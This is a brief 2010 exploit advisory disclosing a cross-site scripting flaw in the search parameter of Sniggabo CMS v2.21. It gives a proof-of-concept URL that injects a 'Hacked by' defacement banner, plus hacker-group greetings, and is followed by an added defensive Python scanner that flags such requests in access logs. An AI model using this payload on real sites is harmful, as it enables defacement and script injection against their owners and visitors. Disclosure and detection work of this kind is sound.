Sniggabo CMS v2.21 XSS Vulnerability

# Exploit Title: Sniggabo CMS v2.21 Cross Site Scripting Vulnerability
# Date: January 6th, 2010
# Author: Sora
# Version: v2.21
# Tested on: Windows Vista Home Premium and Linux 2.6.32

----------------------------------------
> Sniggabo CMS v2.21 Cross Site Scripting Vulnerability
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com/
> Google Dork: “In your dreams, script kiddies.”

# Description:
Sniggabo CMS v2.21 suffers from a cross-site scripting vulnerability in the 'q'
parameter of search.php.

# PoC: http://www.site.com/search.php?q=%3Ch1%3EHacked%20by%20Sora%20-%20vhr95zw%20%5Bat%5D%20hotmail%20%5Bdot%5D%20com%3C/h1%3E%3Chr%3Eh4x3d%20-%20http://greyhathackers.wordpress.com/%3Cbr%3E&site=www.google.ca

# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes # Mafia Boyz DZ Crew # 原点 # cyber-sec.org # greyhathackers.wordpress.com # incursioexsubter.info #
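
A defender-side check for the request pattern in the PoC, as an added example that is not part of the original advisory: it scans access-log lines for search.php requests whose decoded 'q' value contains HTML tags. The combined log format, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# An opening or closing HTML tag such as <h1>, </h1> or <hr>.
TAG_RE = re.compile(r'<\s*/?\s*[a-zA-Z][^>]*>')


def find_markup_in_q(log_line):
    """Return the decoded 'q' value if a search.php request carries HTML
    markup in it, otherwise None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/search.php"):
        return None
    # parse_qs percent-decodes values, so %3Ch1%3E becomes <h1>.
    for value in parse_qs(url.query, keep_blank_values=True).get("q", []):
        if TAG_RE.search(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_q) for every flagged log line."""
    return [(i, hit) for i, line in enumerate(lines, 1)
            if (hit := find_markup_in_q(line))]


# Constructed sample log lines (documentation IP range, harmless markup).
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Jan/2010:10:00:01 +0000] '
    '"GET /search.php?q=cms+themes&site=www.google.ca HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Jan/2010:10:00:07 +0000] '
    '"GET /search.php?q=%3Ch1%3Etest%3C/h1%3E%3Chr%3E&site=www.google.ca HTTP/1.1" 200 5203',
    '203.0.113.9 - - [06/Jan/2010:10:00:09 +0000] '
    '"GET /index.php?q=%3Cb%3Ex%3C/b%3E HTTP/1.1" 200 812',
    '203.0.113.7 - - [06/Jan/2010:10:00:12 +0000] '
    '"GET /search.php?q=a+%3C+b HTTP/1.1" 200 4990',
]

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: markup in q -> {value!r}")
```

Only single percent-encoding is decoded here; a bare `<` that is not part of a tag (the last sample line) is not flagged.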
